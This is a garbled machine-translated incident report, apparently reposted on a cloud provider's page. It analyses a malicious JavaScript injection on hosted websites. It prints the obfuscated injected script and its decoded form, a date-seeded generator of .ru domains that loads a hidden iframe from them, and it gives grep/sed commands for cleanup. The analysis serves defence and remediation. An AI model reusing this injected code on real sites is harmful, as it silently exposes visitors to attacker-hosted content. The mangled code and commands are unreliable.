High-end black chain SEO-malicious JS Script Injection for access to pseudo-random Domain Names (analysis and solution)

Source: Internet
Author: User

Our server has another intrusion accident. Some customers have inserted a Javascript script at the bottom of their html webpage. As a result, when a visitor opens the webpage, the antivirus software warns the website of malicious code. This is a common method in black chain SEO, But the strange thing is that the code we captured this time will generate a (pseudo) random domain name based on the current timestamp, and then access it regularly. It seems that the goal is not SEO.I. Attack AnalysisThe inserted javascript is here -- <script lang = "javascript">/* km0ae9gr6m */s = ""; try {q = document. createElement ("p"); q. appendChild ("123" + n);} catch (qw) {h =-016/7; try {a = prototype;} catch (zxc) {e = window ["e" + "va" + "l"]; n = "Uniform Invalid. Invalid. Invalid. Invalid. Bytes. Timeout. Timeout Bytes Bytes Bytes Bytes. Timeout Bytes Bytes. Timeout. Timeout Please ". split (". "Please refer if(please refer Doc ument) for (I = 6-2-1-2-1;-1828 + I! = 2-2; I ++) {k = I; s = s + String. fromCharCode (n [k]/(I % (h * h) + 2);} console. log (s) ;}}/* qhk6sa6g1c */</script> I don't know what to do when I get this code. I have to speak out here, why does our O & M not understand the code ...... I put it in Chrome and decode it like this: functionnextRandomNumber () {varhi = this. seed/this. q; varlo = this. seed % this. q; vartest = this. A * lo-this.R * hi; if (test> 0) {this. seed = test;} else {this. seed = test + this. m;} return (this. seed * this. oneOverM);} functionRandomNumberGenerator (unix) {vard = newDate (unix * 1000); vars = d. getHours ()> 12? 1:0; this. seed = 2345678901 + (d. getMonth () * 0 xFFFFFF) + (d. getDate () * 0 xFFFF) + (Math. round (s * 0 xFFF); this. A = 48271; this. M = 2147483647; this. Q = this. m/this. a; this. R = this. M % this. a; this. oneOverM = 1.0/this. m; this. next = nextRandomNumber; returnthis;} functioncreateRandomNumber (r, Min, Max) {returnMath. round (Max-Min) * r. next () + Min);} functiongeneratePseudoRandomString (unix, length, zone) {varrand = newRandomNumberGenerator (unix ); Varletters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'h ', 'I', 'J', 'k', 'l', 'M', 'n', 'O', 'P', 'Q', 'R ', 'S ', 't', 'U', 'V', 'w', 'x', 'y', 'z']; varstr = ''; for (vari = 0; I <length; I ++) {str + = letters [createRandomNumber (rand, 0, letters. length-1)];} returnstr + '. '+ zone;} setTimeout (function () {try {if (typeofiframeWasCreated = "undefined") {iframeWasCreated = true; varunix = Math. round (+ newDate ()/1000); vardomainName = generatePseudoRandomString (un Ix, 16, 'ru '); ifrm = document. createElement ("IFRAME"); ifrm. setAttribute ("src", "http: //" + domainName + "/runforestrun? Sid = cx "); ifrm. style. width = "0px"; ifrm. style. height = "0px"; ifrm. style. visibility = "hidden"; document. body. appendChild (ifrm) ;}} catch (e) {}}, 500); it is interesting to know that it has a built-in random domain name generation function. Based on the unix timestamp, the pseudo-random number generator is a "pseudo" random because it is not a real random. We can calculate the result based on time. In fact, it generates a domain name like ctonxidjqijsnzny.ru znycugibimtvplve.ru every 12 hours. This is not a new hacker. Previously, some security personnel analyzed the download of malware. The attacker even used twitter messages as seeds to generate domain names. This was truly random and unpredictable, there is no way to issue warnings or block them. In other words, before this code starts to operate and generate access traffic, hackers have enough time to register and configure domain names and mount Trojan links. Without a doubt, if 2012 is not the end of the world, we can easily predict what domain name it will generate. So I checked the write-in program. In the next August 7, 2012, 89 domain names were registered, and WHOIS showed that the DNS resolution server was in Russia. The real hacker power is well known. After searching on the Internet, many foreign service providers also encountered this problem. Some people even observed some server logic, such as the 302 redirection mechanism based on the visitor's IP address.Ii. Security VulnerabilitiesMore importantly, how is malicious js code injected into our customers' webpages? By viewing the logs, we found that the hacker was a file upload vulnerability in a famous background management system. The vendor has provided a solution to fix the vulnerability. They suggest resetting the passwords of all users ......3. Wipe your assThis is my task. It took an hour to write two sentences and the test passed. # Checkgrep-rl-include = *. {php, js, htm, html} "km0ae9gr6m"/var/www/vhosts/*> injeted_list.txt # clean upgrep-rl-include = *. {php, js, htm, html} "km0ae9gr6m"/var/www/vhosts/* | xargssed-I-e's/\ * km0ae9gr6m/\ n &/G'-e's/qhk6sa6g1c \ // & \ n/G'-E'/km0ae9gr6m */, /qhk6sa6g1c/d'Reference link:Http://research.zscaler.com/2012/07/mass-compromise-includes-computerworld.html

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.